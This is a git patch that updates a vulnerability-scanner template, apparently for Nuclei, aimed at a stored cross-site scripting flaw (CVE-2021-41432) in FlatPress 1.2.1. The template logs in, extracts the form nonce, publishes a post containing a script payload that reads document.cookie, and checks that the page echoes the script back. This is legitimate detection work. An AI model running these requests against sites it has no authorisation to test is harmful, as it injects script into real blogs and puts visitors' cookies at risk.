From c3e5cd2b84d46a57de462c4f4e5887de980711e5 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 14 Oct 2022 12:05:11 +0530
Subject: [PATCH] Update CVE-2021-41432.yaml

---
 cves/2021/CVE-2021-41432.yaml | 49 ++++++++++++++++++++++-------------
 1 file changed, 31 insertions(+), 18 deletions(-)

diff --git a/cves/2021/CVE-2021-41432.yaml b/cves/2021/CVE-2021-41432.yaml
index 2b0e391b2c..e95825f6b5 100644
--- a/cves/2021/CVE-2021-41432.yaml
+++ b/cves/2021/CVE-2021-41432.yaml
@@ -1,17 +1,20 @@
 id: CVE-2021-41432
 
 info:
-  name: FlatPress 1.2.1 - Cross-site scripting (XSS)
+  name: FlatPress 1.2.1 - Cross-site scripting
   author: arafatansari
   severity: medium
   description: |
     A stored cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content.
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41432
+    - https://github.com/flatpressblog/flatpress/issues/88
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41432
+  classification:
+    cve-id: CVE-2021-41432
   metadata:
+    verified: true
     shodan-query: http.html:"Flatpress"
-    verified: "true"
-  tags: xss,cve,2021
+  tags: cve,cve2021,flatpress,xss,authenticated
 
 requests:
   - raw:
@@ -23,38 +26,48 @@ requests:
         ------WebKitFormBoundarykGJmx9vKsePrMkVp
         Content-Disposition: form-data; name="user"
 
-        admin
+        {{username}}
         ------WebKitFormBoundarykGJmx9vKsePrMkVp
         Content-Disposition: form-data; name="pass"
 
-        password
+        {{password}}
         ------WebKitFormBoundarykGJmx9vKsePrMkVp
         Content-Disposition: form-data; name="submit"
 
         Login
         ------WebKitFormBoundarykGJmx9vKsePrMkVp--
 
+      - |
+        GET /admin.php?p=entry&action=write HTTP/1.1
+        Host: {{Hostname}}
+
       - |
         POST /admin.php?p=entry&action=write HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        _wpnonce=4150bd5fe5&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish
+        _wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish
 
       - |
-        GET /index.php/2022/10/10/abcd/ HTTP/1.1
+        GET /index.php/2022/10 HTTP/1.1
         Host: {{Hostname}}
 
+    req-condition: true
     cookie-reuse: true
-    redirects: true
-    max-redirects: 2
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        words:
-          - "<script>alert(document.cookie)</script>"
+      - type: dsl
+        dsl:
+          - "contains(all_headers_4, 'text/html')"
+          - "status_code_4 == 200"
+          - "contains(body_4, '<p><script>alert(document.cookie)</script></p>')"
+          - "contains(body_4, 'FlatPress')"
         condition: and
+
+    extractors:
+      - type: regex
+        name: nonce
+        part: body
+        group: 1
+        regex:
+          - 'name="_wpnonce" value="([0-9a-z]+)" />'
+        internal: true